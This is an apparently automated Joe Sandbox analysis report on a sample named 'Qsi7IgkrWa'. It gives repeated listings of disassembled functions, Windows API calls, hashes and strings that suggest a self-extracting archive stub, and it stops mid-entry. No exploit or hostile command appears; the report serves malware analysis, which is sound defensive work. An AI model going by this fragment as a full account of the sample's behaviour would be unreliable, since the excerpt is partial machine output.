                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: 228c338dc6d81d57c03094d7e29af8c05c66039ce036a6533b2707a61e56229e
                                        • Instruction ID: 64f17b18bd162a6dc2a23607fde6c3e421c3564e23539eb9865c575cb60cbc48
                                        • Opcode Fuzzy Hash: 228c338dc6d81d57c03094d7e29af8c05c66039ce036a6533b2707a61e56229e
                                        • Instruction Fuzzy Hash: E8118FB1A84709DBC3215F6ADC84AA7FBECEB54744F144C6EE1DA87201DAB199408B54
                                        APIs
                                          • Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
                                          • Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370
                                        • EndDialog.USER32(?,00000001), ref: 00BCB2BE
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BCB2D6
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 00BCB304
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: GETPASSWORD1
                                        • API String ID: 445417207-3292211884
                                        • Opcode ID: 8159f2df2a113df6d83a2cfdff4d9e89b796aa9bcd5f88af19dc6cb16d4e1346
                                        • Instruction ID: 5d9be1bd58e8af65b5e6c3a9287c414e3bcd808e091ab152eba9436822f75ef6
                                        • Opcode Fuzzy Hash: 8159f2df2a113df6d83a2cfdff4d9e89b796aa9bcd5f88af19dc6cb16d4e1346
                                        • Instruction Fuzzy Hash: 0111C83290015577DF219A64AC4AFFF3BECEF5A704F1000A9FA46F61C0C7A49A459765
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: 3bfc919058bf4bf97d9ce58bba0ff7c9f8b7a9a78334856530dd09133ef2d826
                                        • Instruction ID: 0a71f319ae9ca0a4d62fbb5e19cab4fee3a9cdca0541fd8b07313402226018e6
                                        • Opcode Fuzzy Hash: 3bfc919058bf4bf97d9ce58bba0ff7c9f8b7a9a78334856530dd09133ef2d826
                                        • Instruction Fuzzy Hash: EF01717AA04285AFDB118F69FC44FAA7BE8F709354B00487EF90687330CB319850DBA0
                                        APIs
                                        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00BCDBF4
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BCDC30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 1431749950-3493335439
                                        • Opcode ID: 59325d1413f07d0430b621f564ba5d2c11dd4b15846ca7429f44e413ffdce86f
                                        • Instruction ID: 0fe196aadef2f332c2c2a29529064ab690a169280fc6359ac6ec76982a2fbc65
                                        • Opcode Fuzzy Hash: 59325d1413f07d0430b621f564ba5d2c11dd4b15846ca7429f44e413ffdce86f
                                        • Instruction Fuzzy Hash: 50F0EC72405224E7CB202F958C4AFFB37D8EF04B81B0404EDBD85AB151D7B08980D6B1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                        • Instruction ID: b35ad4acbf35f8634e3c4ef936f7e0413b2e511171a7659f380e2102d40cef16
                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                        • Instruction Fuzzy Hash: 3AA13372A146869FEB258F68C8817AEFBE5EF51310F2841EFE5959B381E2388941C750
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00BB7F69,?,?,?), ref: 00BBA3FA
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00BB7F69,?), ref: 00BBA43E
                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00BB7F69,?,?,?,?,?,?,?), ref: 00BBA4BF
                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00BB7F69,?,?,?,?,?,?,?,?,?,?), ref: 00BBA4C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseHandleTime
                                        • String ID:
                                        • API String ID: 2287278272-0
                                        • Opcode ID: 8d09aaeec1e069e8c98f406e4587f7b1a7bc5c0470ff592018de1730c8469812
                                        • Instruction ID: 3e74967c9722fdedde07585871c65e3df407708942b63bd90dd23da89d028580
                                        • Opcode Fuzzy Hash: 8d09aaeec1e069e8c98f406e4587f7b1a7bc5c0470ff592018de1730c8469812
                                        • Instruction Fuzzy Hash: A341CF31648381ABE731DF24DC89FEEBBE8EB85700F04099DB5D197281D6E49A48DB53
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID:
                                        • API String ID: 176396367-0
                                        • Opcode ID: 7081f956f699d334f06aef35e5d80c956d26517b7cf0116f445ff74db6241872
                                        • Instruction ID: 9cd7f3fdf389b309501e32adbc1ae3ebc3fae792adbc9a94d6860a2cef840c95
                                        • Opcode Fuzzy Hash: 7081f956f699d334f06aef35e5d80c956d26517b7cf0116f445ff74db6241872
                                        • Instruction Fuzzy Hash: 8941D6719006699BCB119F688C59AEEBBF8EF05310F00446AFD45F7242DB70AE448BA4
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BD91E0,?,00000000,?,00000001,?,?,00000001,00BD91E0,?), ref: 00BDC9D5
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDCA5E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BD6CBE,?), ref: 00BDCA70
                                        • __freea.LIBCMT ref: 00BDCA79
                                          • Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 91fcf5968c1621282f47a7f4d824e6efe778691554bf51ed2cc7031db7a32b19
                                        • Instruction ID: a7a1bf3a0b7b0bb5e13df6cf89ed9ec6ca5a425faa0737c6c500f0472bbe0d78
                                        • Opcode Fuzzy Hash: 91fcf5968c1621282f47a7f4d824e6efe778691554bf51ed2cc7031db7a32b19
                                        • Instruction Fuzzy Hash: ED31A27190021AABDB25DF64CC85DBEBBE5EF01710B1442A9FC04EB294EB35DD50CB90
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00BCA666
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BCA675
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BCA683
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00BCA691
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: f4a72d023f4b4d8a623d6c9464e1374ba4fb1fd88ed712c4625983d34990eb23
                                        • Instruction ID: 96ab336b7e9b04e92707d0281c9ea22959b69cbf15e4d366ad9220c7360e3d82
                                        • Opcode Fuzzy Hash: f4a72d023f4b4d8a623d6c9464e1374ba4fb1fd88ed712c4625983d34990eb23
                                        • Instruction Fuzzy Hash: E7E0EC31942761A7D7615B60BD0DBDE3ED8BB0AB56F018151FA05A7290DB6486008BA1
                                        APIs
                                          • Part of subcall function 00BCA699: GetDC.USER32(00000000), ref: 00BCA69D
                                          • Part of subcall function 00BCA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BCA6A8
                                          • Part of subcall function 00BCA699: ReleaseDC.USER32(00000000,00000000), ref: 00BCA6B3
                                        • GetObjectW.GDI32(?,00000018,?), ref: 00BCA83C
                                          • Part of subcall function 00BCAAC9: GetDC.USER32(00000000), ref: 00BCAAD2
                                          • Part of subcall function 00BCAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00BCAB01
                                          • Part of subcall function 00BCAAC9: ReleaseDC.USER32(00000000,?), ref: 00BCAB99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: (
                                        • API String ID: 1061551593-3887548279
                                        • Opcode ID: 6ac601fd595a322c83a1a36210d3a1a885f8bd5d80c8f974d82f67d7dfab0129
                                        • Instruction ID: 8a6ae23da7aaf7d52f5790a55962db0dea58ded85f68794dbb85f69a2836508f
                                        • Opcode Fuzzy Hash: 6ac601fd595a322c83a1a36210d3a1a885f8bd5d80c8f974d82f67d7dfab0129
                                        • Instruction Fuzzy Hash: DA91E071608394AFD610DF25D888E2BBBE8FF89704F00495EF59AD7260DB70A945CF62
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB75E3
                                          • Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0
                                          • Part of subcall function 00BBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BBA598
                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB777F
                                          • Part of subcall function 00BBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA501
                                          • Part of subcall function 00BBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA532
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                        • String ID: :
                                        • API String ID: 3226429890-336475711
                                        • Opcode ID: 66ebd229680287bef95acedfdd0ff9a2fecf88b60f1e786d4c02a4f0f625060f
                                        • Instruction ID: 602dbfc73e42d6630d6d785e3002b0abafb3a4c6c5dd330f344a677c20ec17a4
                                        • Opcode Fuzzy Hash: 66ebd229680287bef95acedfdd0ff9a2fecf88b60f1e786d4c02a4f0f625060f
                                        • Instruction Fuzzy Hash: 34414171841258ABEB25EB65CD95EFE73F8EF91300F0040D6A605A6092DFB45F85CB61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: }
                                        • API String ID: 176396367-4239843852
                                        • Opcode ID: f1dc2adc8308bb137a6a4fe4a44c4c00d064b4ee206f1d99d49d0dcf85a57cec
                                        • Instruction ID: 1bd445d78aaa765874e0eb63eed7d94c556af5814ee1d8d28b1c77d3ab7fd8c3
                                        • Opcode Fuzzy Hash: f1dc2adc8308bb137a6a4fe4a44c4c00d064b4ee206f1d99d49d0dcf85a57cec
                                        • Instruction Fuzzy Hash: EA21AE7290430A5AD731AA64D856F6FB3ECDFA1750F1404AEF680C3242FB65DD4883A2
                                        APIs
                                          • Part of subcall function 00BBF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BBF2E4
                                          • Part of subcall function 00BBF2C5: GetProcAddress.KERNEL32(00BF81C8,CryptUnprotectMemory), ref: 00BBF2F4
                                        • GetCurrentProcessId.KERNEL32(?,?,?,00BBF33E), ref: 00BBF3D2
                                        Strings
                                        • CryptUnprotectMemory failed, xrefs: 00BBF3CA
                                        • CryptProtectMemory failed, xrefs: 00BBF389
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        • Opcode ID: 17f1f1e6dd86cb48c21e19cc4ac9e9ca355152f0d3418ee098e94426516fd9f8
                                        • Instruction ID: 18cf154f8a13ea5be0d40f16d7182fea74493971bdfb5eb5f33c2ea5429f6c30
                                        • Opcode Fuzzy Hash: 17f1f1e6dd86cb48c21e19cc4ac9e9ca355152f0d3418ee098e94426516fd9f8
                                        • Instruction Fuzzy Hash: 4011033260026AABDF119F21DC85ABE3BD5EF04B20B0042E6FC416B251DEB49E418A98
                                        APIs
                                        • _swprintf.LIBCMT ref: 00BBB9B8
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: __vswprintf_c_l_swprintf
                                        • String ID: %c:\
                                        • API String ID: 1543624204-3142399695
                                        • Opcode ID: 0b9538aaab741e36302507bf60a10a87bf4dc8f159abd32004f6dc22fa2a17f8
                                        • Instruction ID: ba00b9f5dd484a74b0f9592be5c09d5bbf70607c6d27df7ab8b86f02ff7bb88a
                                        • Opcode Fuzzy Hash: 0b9538aaab741e36302507bf60a10a87bf4dc8f159abd32004f6dc22fa2a17f8
                                        • Instruction Fuzzy Hash: 7B01D2675003116A9A30AB698C86DBBE7ECEE92770B40449BF584D6182FBF0D84082B1
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00010000,00BC1160,?,00000000,00000000), ref: 00BC1043
                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 00BC108A
                                          • Part of subcall function 00BB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB6C54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
